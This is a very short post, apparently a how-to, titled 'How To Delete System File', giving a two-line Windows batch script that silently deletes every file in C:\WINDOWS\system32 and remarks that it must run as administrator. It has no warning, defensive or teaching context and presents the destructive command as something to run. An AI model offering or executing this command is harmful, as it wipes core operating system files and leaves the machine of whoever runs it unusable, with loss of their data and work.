How To Delete System File

@echo off
del C:\WINDOWS\system32\*.* /q


This .bat need run as administrator.